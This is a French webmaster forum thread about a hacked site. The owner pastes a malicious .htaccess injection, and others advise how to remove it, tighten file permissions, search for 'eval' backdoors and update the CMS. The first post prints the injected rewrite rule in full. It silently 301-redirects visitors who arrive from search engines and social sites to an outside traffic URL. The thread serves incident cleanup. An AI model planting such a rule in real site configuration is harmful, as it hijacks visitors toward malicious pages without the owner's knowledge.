Discussion :

[reureureu]

Bonsoir à tous,

"page malveillante, le retour !", enfin presque, mon souci est un peu différent cette fois-ci. Aucun problème de mon côté, un de mes clients m'envoie une capture de mon site sous Google Chrome avec un message d'alerte "le site web que vous allez ouvrir contient une page malveillante". J'essaie de mon côté sur IE, Firefox et Google Chrome, pas de problème, bon.

Par contre, dans mon Google Outils pour webmaster, j'ai bien un message d'alerte me disant que certaines pages ont été infectés par une injection de code dans le .htaccess

J'ouvre le .htaccess, je compare avec les éléments que mon client m'a donné et effectivement, je trouve qu'on m'a injecté une redirection vers le site http://boldcraft.cba.pl[....]

Seulement, je ne suis pas sûre de ce que je dois exactement retirer de mon .htaccess (sachant que je ne verrai pas la différence puisque chez moi, je n'ai pas de problème d'affichage).

Voici la portion de code, pouvez-vous me donner votre avis ? Merci !

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
#336988#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://boldcraft.cba.pl/infusions/traf.php [R=301,L]
</IfModule>

#/336988#
#

Stéphanie de www.franchise-land.com

[Muchos]

Euh… Il s'agit d'une réécriture d'url. Il faut retirer tout ce code, je pense.

Au passage, ce n'est pas normal que le htaccess ait été modifié par un tiers.

[reureureu]

Bonjour Muchos et merci de ta réponse.

Je retire donc bien tout ce qu'il y a entre les balises <IfModule> ? Et pas seulement la ligne où il y a l'adresse frauduleuse.

Oui, je ne sais pas comment le htaccess a pu être modifié, j'ai fait un back-up la semaine dernière, et suis intervenu dedans pour modifier la version de PHP, mais je n'ai pas fait attention au reste du contenu du fichier. C'est la 2ème fois en 10 jours que je me fais attaquer, est-ce que quelqu'un passe par le CMS qui n'est pas mis à jour, ou par le ftp (j'ai changé le mdp la semaine dernière), mystère ! Je jette un oeil fréquemment car pas envie d'avoir le site à nouveau bloqué. Nous allons bientôt refaire le site dans son intégralité (c'était prévu) depuis plusieurs semaine, est-ce que ça changera quelque chose ? Je l'espère.

Merci en tout cas et bonne fin de semaine !

[Muchos]

Oui, vous pouvez retirer tout ce qui se trouve ici entre IfModule (en gros, ça dit: «si le module de réécriture est disponible, alors l'activer, puis réécrire les url selon les conditions définies.»)

est-ce que quelqu'un passe par le CMS qui n'est pas mis à jour, ou par le ftp (j'ai changé le mdp la semaine dernière), mystère !

Je n'y connais rien en sécurité informatique. Mais, selon moi, modifier le htaccess exige d'avoir des droits admin. Donc, le ftp pourrait avoir été cracké.

[reureureu]

Merci encore Muchos de ta réponse ! J'ai donc bien retiré l'intégralité de cette maudite balise, mmh toujours aucune idée d'où ça sort, il faudra que je surveille. J'ai eu mon client au téléphone, alors lui a toujours l'erreur, apparemment ça se passe uniquement sur Mac avec Chrome

[Tsilefy]

Le htaccess modifié est juste un symptôme, ce n'est pas l'origine du problème.
Le problème vient du fait que quelqu'un a réussi à mettre en ligne un script sur ton site (sans doute en profitant d'une vulnérabilité ou d'un CMS non à jour), et peut donc écrire dans n'importe quel fichier.
La première chose à faire est de modifier les permissions du fichier .htaccess à 644.
Ensuite, et c'est le plus difficile, il faut éliminer le script en question. Déjà, il faut voir si tu as Wordpress ou Joomla? Est-ce que tu as des répertoires qui sont en libre accès pour tous (permissions à 777), du genre cache ou upload ? Vérifie les fichiers récemments modifiés, fais un grep cherchant "eval" sur tous les fichiers .php si tu as accès à la console.
Dernière étape, mets à jour ton CMS ou corrige les vulnérabilités si c'est un CMS maison.